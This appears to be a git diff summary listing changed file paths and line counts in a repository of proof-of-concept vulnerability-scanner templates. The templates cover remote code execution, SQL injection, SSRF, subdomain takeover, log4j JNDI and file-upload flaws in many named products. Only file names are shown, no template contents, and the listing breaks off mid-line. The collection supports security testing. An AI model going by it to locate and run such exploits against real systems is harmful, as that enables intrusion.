.../hashicorp-consul-rce-7891.yaml | 12 +- .../hiboss-rce-7945.yaml | 8 +- .../hiboss-rce-7947.yaml | 14 +- .../icewarp-webclient-rce-8133.yaml | 25 - .../jamf-log4j-jndi-rce-8214.yaml | 34 + .../jamf-log4j-jndi-rce.yaml | 38 - .../kubernetes-resource-report-8547.yaml | 4 - .../lotuscms-rce-8650.yaml | 25 - .../lotuscms-rce-8651.yaml | 10 +- .../lotuscms-rce-8652.yaml | 34 + .../lotuscms-rce-8653.yaml | 22 +- .../metersphere-plugin-rce-8836.yaml | 27 +- .../metersphere-plugin-rce.yaml | 52 + .../mirai-unknown-rce-8899.yaml | 34 - .../mobileiron-log4j-jndi-rce-8905.yaml | 35 +- .../mobileiron-log4j-jndi-rce-8906.yaml | 29 +- .../natshell-rce-9009.yaml | 3 +- .../natshell-rce-9012.yaml | 16 +- poc/remote_code_execution/netterce.yaml | 46 +- .../nuuo-nvrmini2-rce-9170.yaml | 23 - .../nuuo-nvrmini2-rce-9171.yaml | 12 +- poc/remote_code_execution/opensns-rce.yaml | 25 +- .../optilink-ont1gew-gpon-rce-9342.yaml | 13 +- .../optilink-ont1gew-gpon-rce-9343.yaml | 31 + .../oscommerce-rce-9408.yaml | 7 +- .../panabit-sy_addmount-rce.yaml | 22 + .../pdf-signer-ssti-to-rce-9470.yaml | 20 + .../pdf-signer-ssti-to-rce-9471.yaml | 3 +- .../pdf-signer-ssti-to-rce-9472.yaml | 22 - ...aml => phalcon-framework-source-9494.yaml} | 0 .../phalcon-framework-source-9496.yaml | 25 - ...ml => php-zerodium-backdoor-rce-9572.yaml} | 0 .../php-zerodium-backdoor-rce.yaml | 29 - .../powercreator-cms-rce-9645.yaml | 42 + .../powercreator-cms-rce.yaml | 37 + ...ang-next-generation-firewall-rce-9758.yaml | 32 + ...ang-next-generation-firewall-rce-9761.yaml | 41 + .../qvisdvr-deserialization-rce-9774.yaml | 1 - .../qvisdvr-deserialization-rce-9775.yaml | 26 +- .../rconfig-rce-9834.yaml | 20 +- .../ruijie-eg-rce-9926.yaml | 10 +- .../ruijie-eg-rce-9929.yaml | 11 +- .../salesforce-aura-9984.yaml | 16 +- .../salesforce-aura.yaml | 27 - .../samsung-wlan-ap-rce-10009.yaml | 23 +- .../samsung-wlan-ap-rce-10010.yaml | 9 +- poc/remote_code_execution/sangfor-BA-rce.yaml | 41 +- .../sangfor-ba-rce(1).yaml | 8 +- .../sangfor-ba-rce-10020.yaml | 22 + .../sangfor-ba-rce-10021.yaml | 13 +- .../seacms-rce-10101.yaml | 24 + .../showdoc-file-upload-rce-10227.yaml | 40 + .../simple-employee-rce-10279.yaml | 49 + .../simple-employee-rce-10280.yaml | 49 - .../{spon-ip-rce.yaml => spon-ip-rce(1).yaml} | 0 .../sponip-network-system-ping-rce-10421.yaml | 41 + .../springboot-h2-db-rce-10455.yaml | 2 +- ...e-10457.yaml => springboot-h2-db-rce.yaml} | 0 .../tamronos-rce-10649.yaml | 32 - .../tamronos-rce-10651.yaml | 7 +- .../thinkcmf-rce-10728.yaml | 9 +- .../thinkcmf-rce-10729.yaml | 27 +- .../thinkphp-2-rce-10740.yaml | 27 - .../thinkphp-501-rce-10743.yaml | 39 - .../thinkphp-501-rce.yaml | 24 + .../thinkphp-5022-rce-10744.yaml | 27 + .../thinkphp-5022-rce-10746.yaml | 10 +- ...-rce.yaml => thinkphp-5022-rce-10747.yaml} | 0 .../thinkphp-5023-rce-10748.yaml | 25 - .../thinkphp-5023-rce-10751.yaml | 12 +- .../unifi-network-log4j-rce-10974.yaml | 16 +- .../unifi-network-log4j-rce-10976.yaml | 37 +- .../vercel-takeover-11000.yaml | 17 + .../vercel-takeover-11001.yaml | 17 - .../vercel-takeover.yaml | 31 +- .../vmware-horizon-log4j-jndi-rce-11034.yaml | 21 +- .../vmware-horizon-log4j-jndi-rce.yaml | 32 + .../vrealize-operations-log4j-rce-11070.yaml | 44 +- .../vrealize-operations-log4j-rce-11071.yaml | 17 +- .../webui-rce-11170.yaml | 21 - .../webui-rce-11174.yaml | 20 + poc/remote_code_execution/webui-rce.yaml | 1 + ...ls-verification-for-woocommerce-11271.yaml | 25 +- .../wordpress-rce-simplefilelist-11299.yaml | 35 +- .../wordpress-rce-simplefilelist-11304.yaml | 18 +- .../wordpress-woocommerce-listing-11338.yaml | 7 +- .../wordpress-woocommerce-listing-11339.yaml | 22 - .../wordpress-woocommerce-listing-11341.yaml | 23 + .../wordpress-woocommerce-sqli-11342.yaml | 6 +- .../wordpress-woocommerce-sqli-11345.yaml | 44 - .../workresources-rdp-11380.yaml | 2 +- poc/remote_code_execution/wp-force-ssl.yaml | 59 + ...-woocommerce-email-verification-11619.yaml | 47 +- .../wp-woocommerce-file-download-11620.yaml | 38 + .../wp-woocommerce-file-download.yaml | 25 - .../wp-xmlrpc-brute-force-11623.yaml | 2 +- poc/remote_code_execution/yapi-rce-11724.yaml | 27 +- poc/remote_code_execution/yapi-rce-11725.yaml | 86 + .../yarn-resourcemanager-rce-11734.yaml | 17 +- .../yarn-resourcemanager-rce-11737.yaml | 15 +- poc/ruby/grails-database-admin-console.yaml | 21 +- poc/ruby/rails-debug-mode-9806.yaml | 17 + poc/ruby/rails-debug-mode-9807.yaml | 17 - poc/ruby/rails-debug-mode.yaml | 17 +- .../rails-secret-token-disclosure-9809.yaml | 22 - .../rails-secret-token-disclosure-9810.yaml | 23 + poc/ruby/rails-secret-token-disclosure.yaml | 3 +- poc/ruby/rails6-xss-9797.yaml | 17 +- poc/ruby/rails6-xss-9798.yaml | 29 +- poc/samba/samba-config-9987.yaml | 34 - poc/samba/samba-config.yaml | 20 + poc/samba/samba-detect-9988.yaml | 8 +- poc/samba/samba-swat-panel.yaml | 16 +- poc/sap/Sap-redirect.yaml | 8 +- poc/sap/sap-hana-xsengine-panel.yaml | 18 +- poc/sap/sap-netweaver-detect-10042.yaml | 25 +- poc/sap/sap-netweaver-detect-10047.yaml | 30 - poc/sap/sap-netweaver-info-leak-10051.yaml | 24 + poc/sap/sap-netweaver-info-leak-10052.yaml | 28 - poc/sap/sap-netweaver-info-leak.yaml | 13 +- poc/sap/sap-netweaver-webgui.yaml | 20 - poc/sap/sap-recon-detect-10063.yaml | 30 - poc/sap/sap-redirect.yaml | 22 - poc/sap/sap-web-dispatcher-10078.yaml | 9 +- ...sap-web-dispatcher-admin-portal-10071.yaml | 32 + poc/sap/sapfiori-panel-10033.yaml | 26 + poc/sap/sapfiori-panel-10034.yaml | 30 - poc/search/aws-opensearch-login-649.yaml | 24 + poc/search/aws-opensearch-login-650.yaml | 25 - poc/search/aws-opensearch-login.yaml | 3 +- poc/search/elasticsearch-7194.yaml | 20 +- .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/search/jolokia-mbean-search-8363.yaml | 5 +- poc/search/jolokia-mbean-search.yaml | 13 +- poc/search/searchbar.yaml | 4 +- poc/search/searches.yaml | 42 - .../sensitive-storage-exposure-10143.yaml | 3 +- poc/sensitive/sensitive-storage-exposure.yaml | 30 - .../zenphoto-installation-sensitive-info.yaml | 33 - .../zenphoto-sensitive-info-11784.yaml | 28 + poc/sensitive/zenphoto-sensitive-info.yaml | 12 +- .../exposed-sharepoint-list-7345.yaml | 28 - .../exposed-sharepoint-list-7347.yaml | 8 +- poc/shopify/shopify-custom-token(1).yaml | 16 + poc/shopify/shopify-custom-token-10198.yaml | 13 - poc/shopify/shopify-custom-token-11860.yaml | 5 +- poc/shopify/shopify-private-token-11861.yaml | 16 - poc/shopify/shopify-private-token.yaml | 5 +- poc/shopify/shopify-takeover-10201.yaml | 26 - poc/shopify/shopify-takeover-10202.yaml | 12 +- poc/shopify/shopify-takeover-10204.yaml | 11 +- poc/smtp/easy-wp-smtp-listing-7156.yaml | 19 + poc/smtp/easy-wp-smtp-listing-7157.yaml | 21 - poc/smtp/easy-wp-smtp-listing.yaml | 5 +- poc/smtp/esmtprc-config-7258.yaml | 10 +- poc/smtp/esmtprc-config-7259.yaml | 11 +- poc/smtp/msmtp-config-8967.yaml | 42 + poc/social/api-instagram.yaml | 10 +- .../flow-flow-social-stream-xss-7524.yaml | 41 + poc/social/flow-flow-social-stream-xss.yaml | 27 - poc/social/linkedin-id-11853.yaml | 16 - poc/social/linkedin-id.yaml | 3 +- poc/social/sassy-social-share-10083.yaml | 23 + ...are-10087.yaml => sassy-social-share.yaml} | 0 poc/social/twitter-secret-10862.yaml | 3 +- poc/social/twitter-secret.yaml | 4 + poc/social/wp-socialfit-xss-11577.yaml | 4 +- poc/sql/74cms-sqli-9.yaml | 7 +- .../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0 poc/sql/CRMEB-sqli.yaml | 2 - poc/sql/GLPI-9.3.3-SQL-Injection.yaml | 19 +- poc/sql/adb-backup-enabled-60.yaml | 15 +- ...> android-debug-database-exposed-314.yaml} | 0 .../android-debug-database-exposed-315.yaml | 47 +- ...seipdb-384.yaml => api-abuseipdb-385.yaml} | 0 poc/sql/api-abuseipdb.yaml | 31 + poc/sql/buildbot-panel-803.yaml | 28 + poc/sql/buildbot-panel.yaml | 29 +- poc/sql/chamilo-lms-sqli-892.yaml | 37 - poc/sql/chamilo-lms-sqli.yaml | 26 + poc/sql/chanjet-crm-sqli.yaml | 21 + poc/sql/couchdb-adminparty-1235.yaml | 55 +- poc/sql/couchdb-adminparty-1237.yaml | 39 + poc/sql/couchdb-exposure-1238.yaml | 25 - poc/sql/couchdb-exposure-1239.yaml | 24 + poc/sql/couchdb-exposure-1241.yaml | 6 +- poc/sql/database-error-6771.yaml | 12 +- poc/sql/db-backup-lfi-6774.yaml | 25 - poc/sql/db-backup-lfi-6775.yaml | 30 + poc/sql/db-backup-lfi-6776.yaml | 11 +- poc/sql/db-backup-lfi.yaml | 4 - poc/sql/db-schema-6783.yaml | 38 + poc/sql/dbeaver-credentials-6780.yaml | 42 - poc/sql/dbeaver-credentials-6782.yaml | 11 +- ...aml => dedecms-membergroup-sqli-6796.yaml} | 0 poc/sql/dedecms-membergroup-sqli-6798.yaml | 15 +- poc/sql/dotnetcms-sqli-7089.yaml | 22 +- poc/sql/dotnetcms-sqli.yaml | 25 - poc/sql/duomicms-sql-injection-7124.yaml | 27 + poc/sql/duomicms-sql-injection.yaml | 22 + poc/sql/ecology-syncuserinfo-sqli-7177.yaml | 19 +- poc/sql/ecology-syncuserinfo-sqli.yaml | 25 + .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/sql/etouch-v2-sqli-7266.yaml | 26 + poc/sql/etouch-v2-sqli-7267.yaml | 16 +- poc/sql/exposed-adb-7280.yaml | 7 +- poc/sql/exposed-adb-7281.yaml | 15 +- poc/sql/exposed-adb-7282.yaml | 22 + poc/sql/exposed-mysql-initial-7323.yaml | 17 +- poc/sql/exposed-mysql-initial-7324.yaml | 9 +- poc/sql/exposed-sqlite-manager-7349.yaml | 3 +- poc/sql/exposed-sqlite-manager.yaml | 18 +- poc/sql/firebase-database-7490.yaml | 4 +- poc/sql/glpi-9.3.3-sql-injection.yaml | 25 + poc/sql/grails-database-admin-console.yaml | 21 +- poc/sql/hasura-graphql-psql-exec-7899.yaml | 19 +- poc/sql/influxdb-detect-8160.yaml | 11 +- poc/sql/influxdb-detect.yaml | 11 +- poc/sql/jdbc-connection-string-8246.yaml | 7 +- poc/sql/kevinlab-bems-sqli-8457.yaml | 30 - poc/sql/kevinlab-bems-sqli-8459.yaml | 20 +- poc/sql/mdb-database-file-8795.yaml | 32 + poc/sql/mdb-database-file-8796.yaml | 33 - poc/sql/mdb-database-file.yaml | 19 +- poc/sql/mongodb-detect-8920.yaml | 20 + poc/sql/mongodb-detect.yaml | 20 +- poc/sql/mongodb-ops-manager.yaml | 19 +- poc/sql/mongodb-unauth-8925.yaml | 22 - poc/sql/mongodb-unauth-8928.yaml | 15 +- poc/sql/mysql-native-password-8981.yaml | 5 +- poc/sql/mysql-native-password.yaml | 21 +- poc/sql/odoo-database-manager-9202.yaml | 3 - poc/sql/odoo-database-manager-9204.yaml | 23 + poc/sql/odoo-database-manager-9205.yaml | 23 - poc/sql/openerp-database-9275.yaml | 18 - poc/sql/openerp-database-9277.yaml | 22 + poc/sql/openerp-database.yaml | 6 +- poc/sql/oracle-dbass-detect-9350.yaml | 1 - poc/sql/oracle-dbass-detect-9351.yaml | 21 - poc/sql/oracle-dbass-detect.yaml | 18 - poc/sql/oracle-dbcs-9353.yaml | 9 +- .../oracle-ebs-sqllog-disclosure-9369.yaml | 26 - .../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +- .../pbootcms-database-file-download-9469.yaml | 29 + poc/sql/pbootcms-database-file-download.yaml | 20 +- poc/sql/phpmyadmin-sql-9534.yaml | 28 - poc/sql/phpmyadmin-sql.php-server.yaml | 5 - poc/sql/pikpikcusqli.yaml | 47 + poc/sql/puppetdb-detect-9717.yaml | 15 +- poc/sql/puppetdb-detect-9718.yaml | 11 +- poc/sql/quick-cms-sqli.yaml | 42 + poc/sql/seaCMS-sqli.yaml | 28 +- poc/sql/seacms-sqli-10103.yaml | 39 + poc/sql/sequoiadb-default-login-10150.yaml | 17 +- poc/sql/simple-crm-sql-injection-10275.yaml | 18 +- poc/sql/simple-crm-sql-injection-10277.yaml | 12 +- poc/sql/springboot-h2-db-rce-10455.yaml | 2 +- ...e-10457.yaml => springboot-h2-db-rce.yaml} | 0 poc/sql/sql-dump.yaml | 19 +- poc/sql/sql-injection.yaml | 94 +- poc/sql/sql-monitor.yaml | 20 +- poc/sql/sql-server-reporting-10509.yaml | 13 - poc/sql/sqli_header-10504.yaml | 23 - poc/sql/suspicious-sql-error-messages.yaml | 32 + poc/sql/symfony-database-config-10615.yaml | 13 +- poc/sql/symfony-database-config-10616.yaml | 17 - ...aml => symfony-database-config-10617.yaml} | 0 poc/sql/thumbs-db-disclosure-10761.yaml | 10 +- ...e.yaml => thumbs-db-disclosure-10763.yaml} | 0 poc/sql/tidb-unauth-10770.yaml | 23 + poc/sql/tidb-unauth-10772.yaml | 26 - poc/sql/time_sql_peremeter.yaml | 469 +- poc/sql/ucmdb-default-login-10868.yaml | 3 +- poc/sql/ucmdb-default-login-10871.yaml | 41 + ...in-10869.yaml => ucmdb-default-login.yaml} | 0 poc/sql/unauthenticated-influxdb-10903.yaml | 27 + poc/sql/unauthenticated-influxdb.yaml | 6 +- poc/sql/weiphp-sql-injection-11190.yaml | 11 +- poc/sql/wordpress-db-repair-11252.yaml | 35 + poc/sql/wordpress-woocommerce-sqli-11342.yaml | 6 +- poc/sql/wordpress-woocommerce-sqli-11345.yaml | 44 - poc/sql/wuzhicms-sqli-11659.yaml | 38 +- poc/sql/xdcms-sqli-11664.yaml | 30 - poc/sql/xdcms-sqli-11666.yaml | 18 +- poc/sql/yongyou-jdbcRead.yaml | 35 +- poc/sql/yongyou-jdbcread.yaml | 42 + poc/sql/zcms-v3-sqli-11773.yaml | 23 - poc/sql/zcms-v3-sqli.yaml | 12 +- poc/sql/zhixiangOA-msglog.aspx-sql.yaml | 4 +- poc/sql_injection/74cms-sqli-9.yaml | 7 +- .../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0 poc/sql_injection/CRMEB-sqli.yaml | 2 - poc/sql_injection/chamilo-lms-sqli-892.yaml | 37 - poc/sql_injection/chamilo-lms-sqli.yaml | 26 + poc/sql_injection/chanjet-crm-sqli.yaml | 21 + ...aml => dedecms-membergroup-sqli-6796.yaml} | 0 .../dedecms-membergroup-sqli-6798.yaml | 15 +- poc/sql_injection/dotnetcms-sqli-7089.yaml | 22 +- poc/sql_injection/dotnetcms-sqli.yaml | 25 - .../ecology-syncuserinfo-sqli-7177.yaml | 19 +- .../ecology-syncuserinfo-sqli.yaml | 25 + poc/sql_injection/etouch-v2-sqli-7266.yaml | 26 + poc/sql_injection/etouch-v2-sqli-7267.yaml | 16 +- .../exposed-sqlite-manager-7349.yaml | 3 +- poc/sql_injection/exposed-sqlite-manager.yaml | 18 +- .../kevinlab-bems-sqli-8457.yaml | 30 - .../kevinlab-bems-sqli-8459.yaml | 20 +- poc/sql_injection/quick-cms-sqli.yaml | 42 + poc/sql_injection/seaCMS-sqli.yaml | 28 +- poc/sql_injection/seacms-sqli-10103.yaml | 39 + poc/sql_injection/sqli.yaml | 47 + poc/sql_injection/sqli_header-10504.yaml | 23 - .../wordpress-woocommerce-sqli-11342.yaml | 6 +- .../wordpress-woocommerce-sqli-11345.yaml | 44 - poc/sql_injection/wuzhicms-sqli-11659.yaml | 38 +- poc/sql_injection/xdcms-sqli-11664.yaml | 30 - poc/sql_injection/xdcms-sqli-11666.yaml | 18 +- poc/sql_injection/zcms-v3-sqli-11773.yaml | 23 - poc/sql_injection/zcms-v3-sqli.yaml | 12 +- poc/ssh/ssh-authorized-keys-10523.yaml | 22 +- poc/ssrf/cloudflare-image-ssrf-1021.yaml | 22 + poc/ssrf/cloudflare-image-ssrf-1023.yaml | 14 +- poc/ssrf/confluence-ssrf-sharelinks-1191.yaml | 31 +- poc/ssrf/confluence-ssrf-sharelinks-1192.yaml | 44 + poc/ssrf/confluence-ssrf-sharelinks-1193.yaml | 36 - poc/ssrf/hasura-graphql-ssrf-7905.yaml | 47 + poc/ssrf/hasura-graphql-ssrf.yaml | 10 +- poc/ssrf/openbmcs-ssrf-9261.yaml | 40 - poc/ssrf/openbmcs-ssrf.yaml | 27 + poc/ssrf/targa-camera-ssrf-10657.yaml | 3 +- poc/ssrf/umbraco-base-ssrf-10881.yaml | 28 +- poc/ssrf/umbraco-base-ssrf.yaml | 41 - poc/ssrf/vmware-vcenter-ssrf-11051.yaml | 19 +- poc/ssrf/vmware-vcenter-ssrf-11052.yaml | 16 +- ...0.yaml => w3c-total-cache-ssrf-11077.yaml} | 0 poc/ssrf/wp-multiple-theme-ssrf-11512.yaml | 4 - poc/ssrf/wp-multiple-theme-ssrf-11513.yaml | 27 + poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml | 15 +- poc/ssrf/yongyou-ssrf-11745.yaml | 18 - poc/ssrf/yongyou-ssrf.yaml | 7 +- poc/ssrf/zimbra-preauth-ssrf-11810.yaml | 14 +- poc/ssrf/zimbra-preauth-ssrf.yaml | 20 + .../aftership-takeover-205.yaml | 29 + .../agilecrm-takeover-208.yaml | 18 + .../agilecrm-takeover-209.yaml | 34 +- poc/subdomain_takeover/aha-takeover-214.yaml | 11 +- poc/subdomain_takeover/aha-takeover-215.yaml | 10 +- poc/subdomain_takeover/aha-takeover-216.yaml | 15 + ...eover-228.yaml => airee-takeover-226.yaml} | 0 .../anima-takeover-318.yaml | 19 - .../anima-takeover-319.yaml | 15 + .../announcekit-takeover-324.yaml | 49 +- .../announcekit-takeover.yaml | 58 +- .../azure-takeover-detection-683.yaml | 29 +- .../bigcartel-takeover-727.yaml | 23 - .../bigcartel-takeover-728.yaml | 24 + .../bigcartel-takeover.yaml | 12 +- .../bitbucket-takeover-738.yaml | 21 + .../bitbucket-takeover-739.yaml | 9 +- .../bitbucket-takeover-740.yaml | 21 - .../bitbucket-takeover.yaml | 19 +- .../brightcove-takeover-783.yaml | 19 + .../brightcove-takeover-784.yaml | 20 + .../brightcove-takeover-785.yaml | 15 - .../brightcove-takeover.yaml | 8 +- ...eover-857.yaml => canny-takeover-854.yaml} | 0 .../canny-takeover-856.yaml | 2 +- .../cargo-takeover-867.yaml | 19 + .../cargo-takeover-868.yaml | 15 - .../cargocollective-takeover-862.yaml | 17 - .../cargocollective-takeover-863.yaml | 21 + .../cargocollective-takeover-865.yaml | 3 +- .../elasticbeantalk-takeover-7188.yaml | 50 + .../elasticbeantalk-takeover.yaml | 6 + .../feedpress-takeover-7455.yaml | 2 +- .../flexbe-takeover-7505.yaml | 23 + poc/subdomain_takeover/flexbe-takeover.yaml | 14 +- .../flywheel-takeover-7525.yaml | 17 + poc/subdomain_takeover/flywheel-takeover.yaml | 20 +- .../freshdesk-takeover-7540.yaml | 22 - .../freshdesk-takeover-7541.yaml | 22 + .../freshdesk-takeover.yaml | 14 +- .../frontify-takeover-7542.yaml | 18 + poc/subdomain_takeover/frontify-takeover.yaml | 17 +- .../gemfury-takeover-7578.yaml | 16 + poc/subdomain_takeover/gemfury-takeover.yaml | 29 +- .../getresponse-takeover-7607.yaml | 15 - .../getresponse-takeover-7609.yaml | 15 + .../getresponse-takeover-7610.yaml | 5 +- .../ghost-takeover-7619.yaml | 16 + .../ghost-takeover-7620.yaml | 17 +- .../ghost-takeover-7621.yaml | 16 - .../gitbook-takeover-7627.yaml | 22 + poc/subdomain_takeover/gitbook-takeover.yaml | 16 +- .../hatenablog-takeover-7907.yaml | 15 + .../hatenablog-takeover-7909.yaml | 5 +- .../helpjuice-takeover-7925.yaml | 15 - .../helpjuice-takeover-7926.yaml | 19 + .../helprace-takeover-7930.yaml | 21 + .../helprace-takeover-7932.yaml | 20 - poc/subdomain_takeover/helprace-takeover.yaml | 17 +- .../helpscout-takeover-7933.yaml | 6 +- .../helpscout-takeover-7936.yaml | 16 + .../heroku-takeover-7943.yaml | 18 +- .../heroku-takeover-7944.yaml | 20 - poc/subdomain_takeover/heroku-takeover.yaml | 3 + .../hubspot-takeover-8077.yaml | 7 +- .../hubspot-takeover-8078.yaml | 3 +- .../intercom-takeover-8166.yaml | 17 + .../intercom-takeover-8167.yaml | 21 - .../intercom-takeover-8169.yaml | 5 +- .../jazzhr-takeover-8235.yaml | 15 + .../jetbrains-takeover-8292.yaml | 16 + .../jetbrains-takeover-8294.yaml | 9 +- .../kinsta-takeover-8492.yaml | 8 +- .../kinsta-takeover-8495.yaml | 18 - .../landingi-takeover-8566.yaml | 17 + .../landingi-takeover-8567.yaml | 17 - poc/subdomain_takeover/landingi-takeover.yaml | 5 +- .../launchrock-takeover-8602.yaml | 16 - .../launchrock-takeover-8603.yaml | 3 +- .../launchrock-takeover-8605.yaml | 18 - .../mashery-takeover-8785.yaml | 2 +- poc/subdomain_takeover/medium-takeover.yaml | 7 +- .../ngrok-takeover-9126.yaml | 16 - .../ngrok-takeover-9128.yaml | 16 + .../pantheon-takeover-9458.yaml | 3 +- .../pantheon-takeover-9459.yaml | 19 - .../pingdom-takeover-9584.yaml | 16 - .../pingdom-takeover-9586.yaml | 16 + .../pingdom-takeover-9587.yaml | 2 +- .../proposify-takeover-9695.yaml | 15 - .../proposify-takeover-9696.yaml | 18 + .../proposify-takeover.yaml | 7 +- .../readme-takeover-9842.yaml | 19 + poc/subdomain_takeover/readme-takeover.yaml | 20 +- .../readthedocs-takeover-9844.yaml | 18 - .../readthedocs-takeover-9845.yaml | 8 +- .../readthedocs-takeover-9846.yaml | 15 + .../readthedocs-takeover-9847.yaml | 7 +- .../s3-subtakeover-9968.yaml | 20 - .../s3-subtakeover-9969.yaml | 24 + .../shopify-takeover-10201.yaml | 26 - .../shopify-takeover-10202.yaml | 12 +- .../shopify-takeover-10204.yaml | 11 +- poc/subdomain_takeover/short-io-takeover.yaml | 15 +- .../simplebooklet-takeover-10272.yaml | 19 - .../simplebooklet-takeover-10274.yaml | 18 + ...0324.yaml => smartjob-takeover-10322.yaml} | 0 ...326.yaml => smartling-takeover-10327.yaml} | 0 .../smartling-takeover.yaml | 4 +- .../smugmug-takeover-10338.yaml | 19 - .../smugmug-takeover-10339.yaml | 15 + .../smugmug-takeover-10340.yaml | 7 +- .../sprintful-takeover-10495.yaml | 7 +- .../sprintful-takeover.yaml | 21 +- .../strikingly-takeover-10550.yaml | 10 +- .../strikingly-takeover-10551.yaml | 17 + .../strikingly-takeover.yaml | 22 +- .../subdomain-takeover-dns-wildcards.yaml | 4 +- .../subdomain-takeover-dns.yaml | 4 +- .../surge-takeover-10578.yaml | 18 - .../surveygizmo-takeover-10583.yaml | 5 +- .../surveygizmo-takeover.yaml | 14 +- .../tave-takeover-10660.yaml | 16 + .../tave-takeover-10662.yaml | 18 - ...0670.yaml => teamwork-takeover-10668.yaml} | 0 .../tictail-takeover-10766.yaml | 17 + .../tictail-takeover-10767.yaml | 18 - ...r-10781.yaml => tilda-takeover-10783.yaml} | 0 .../tilda-takeover-10784.yaml | 6 +- .../tumblr-takeover-10845.yaml | 17 + .../tumblr-takeover-10847.yaml | 24 - poc/subdomain_takeover/tumblr-takeover.yaml | 26 +- .../uberflip-takeover-10864.yaml | 5 +- ...0971.yaml => unbounce-takeover-10970.yaml} | 0 poc/subdomain_takeover/unbounce-takeover.yaml | 33 +- ...9.yaml => uptimerobot-takeover-10987.yaml} | 0 .../uptimerobot-takeover-10988.yaml | 16 +- poc/subdomain_takeover/urge-takeover.yaml | 7 +- .../vend-takeover-10996.yaml | 15 - .../vend-takeover-10998.yaml | 15 + .../vend-takeover-10999.yaml | 5 +- .../vercel-takeover-11000.yaml | 17 + .../vercel-takeover-11001.yaml | 17 - poc/subdomain_takeover/vercel-takeover.yaml | 31 +- .../webflow-takeover-11131.yaml | 15 - .../webflow-takeover-11133.yaml | 15 + poc/subdomain_takeover/webflow-takeover.yaml | 2 +- .../wishpond-takeover-11216.yaml | 16 + .../wishpond-takeover-11217.yaml | 15 - .../wix-takeover-11219.yaml | 5 +- .../wordpress-takeover-11311.yaml | 6 +- .../wordpress-takeover-11312.yaml | 23 + .../wordpress-takeover-11313.yaml | 22 - .../worksites-takeover.yaml | 45 +- .../wufoo-takeover-11648.yaml | 17 + .../wufoo-takeover-11649.yaml | 18 - .../zendesk-takeover-11780.yaml | 15 - .../zendesk-takeover-11781.yaml | 16 + poc/subdomain_takeover/zendesk-takeover.yaml | 27 +- .../pdf-signer-ssti-to-rce-9470.yaml | 20 + .../pdf-signer-ssti-to-rce-9471.yaml | 3 +- .../pdf-signer-ssti-to-rce-9472.yaml | 22 - poc/template_injection/pikpikcussti.yaml | 25 + poc/template_injection/ssti.yaml | 3 - .../twig-php-ssti-10856.yaml | 15 + .../twig-php-ssti-10859.yaml | 1 - .../dahua-wpms-addimgico-fileupload.yaml | 78 +- .../exposed-jquery-file-upload-7313.yaml | 25 +- poc/upload/exposed-jquery-file-upload.yaml | 22 - ...9190.yaml => oa-v9-uploads-file-9191.yaml} | 0 ...file-9189.yaml => oa-v9-uploads-file.yaml} | 0 poc/upload/showdoc-file-upload-rce-10227.yaml | 40 + .../telerik-fileupload-detect-10692.yaml | 13 +- poc/upload/ueditor-file-upload-10872.yaml | 3 +- poc/upload/ueditor-file-upload-10875.yaml | 1 + .../unauthenticated-popup-upload-10921.yaml | 21 + ...yaml => unauthenticated-popup-upload.yaml} | 0 poc/upload/wp-upload-data-11605.yaml | 5 - ...n-11041.yaml => vmware-horizon-11040.yaml} | 0 .../vmware-horizon-log4j-jndi-rce-11034.yaml | 21 +- poc/vmware/vmware-horizon-log4j-jndi-rce.yaml | 32 + poc/vmware/vmware-vcenter-lfi-11047.yaml | 41 - .../vmware-vcenter-lfi-linux-11042.yaml | 2 +- poc/vmware/vmware-vcenter-lfi.yaml | 27 + poc/vmware/vmware-vcenter-ssrf-11051.yaml | 19 +- poc/vmware/vmware-vcenter-ssrf-11052.yaml | 16 +- poc/vmware/vmware-vrealize-detect-11058.yaml | 8 +- ...11057.yaml => vmware-vrealize-detect.yaml} | 0 ...-11059.yaml => vmware-workflow-11060.yaml} | 0 poc/vmware/vmware-workflow.yaml | 11 + poc/web/alphaweb-default-login.yaml | 35 - poc/web/artica-web-proxy-detect-544.yaml | 8 +- poc/web/artica-web-proxy-detect-545.yaml | 22 - ...-543.yaml => artica-web-proxy-detect.yaml} | 0 poc/web/axigen-webadmin-659.yaml | 16 +- poc/web/axigen-webadmin-660.yaml | 24 - poc/web/axigen-webmail.yaml | 43 - poc/web/azkaban-web-client-676.yaml | 32 - poc/web/azkaban-web-client-680.yaml | 30 + poc/web/boa-web-fileread-11846.yaml | 22 + poc/web/boa-web-server.yaml | 38 + poc/web/cobbler-webgui-1123.yaml | 31 + poc/web/cobbler-webgui-1124.yaml | 31 - poc/web/codemeter-webadmin-panel-1135.yaml | 21 + poc/web/codemeter-webadmin-panel-1138.yaml | 31 - poc/web/codemeter-webadmin-panel.yaml | 20 +- poc/web/dixell-xweb500-filewrite-7018.yaml | 14 +- poc/web/dixell-xweb500-filewrite-7020.yaml | 11 +- poc/web/epson-web-control-detect-7239.yaml | 13 +- poc/web/epson-web-control-detect-7242.yaml | 10 +- poc/web/exposed-webalizer-7358.yaml | 18 + poc/web/exposed-webalizer-7360.yaml | 18 - .../fingerprinthub-web-fingerprints-7481.yaml | 3068 +- poc/web/fingerprinthub-web-fingerprints.yaml | 2992 +- poc/web/geovision-geowebserver-lfi-7595.yaml | 20 +- poc/web/geovision-geowebserver-lfi-7596.yaml | 17 +- poc/web/git-web-interface.yaml | 11 +- poc/web/hashicorp-consul-webgui-7896.yaml | 32 + poc/web/hashicorp-consul-webgui-7898.yaml | 2 +- poc/web/honeywell-web-controller-7996.yaml | 23 - poc/web/honeywell-web-controller.yaml | 18 +- poc/web/icewarp-webclient-rce-8133.yaml | 25 - poc/web/icinga-web-login-8134.yaml | 22 + poc/web/icinga-web-login-8137.yaml | 23 - poc/web/icinga-web-login.yaml | 13 +- poc/web/iplanet-web-server-8190.yaml | 21 - poc/web/iplanet-web-server-8191.yaml | 21 + poc/web/iplanet-web-server.yaml | 4 +- poc/web/keenetic-web-login-8442.yaml | 19 + poc/web/keenetic-web-login-8443.yaml | 22 - poc/web/microweber-detect-8863.yaml | 5 +- poc/web/microweber-detect.yaml | 14 +- poc/web/microweber-xss.yaml | 7 +- poc/web/oracle-iplanet-web-server-9392.yaml | 28 + poc/web/oracle-iplanet-web-server.yaml | 21 - poc/web/r-webserver-login.yaml | 22 +- poc/web/saia-web-server-info-9979.yaml 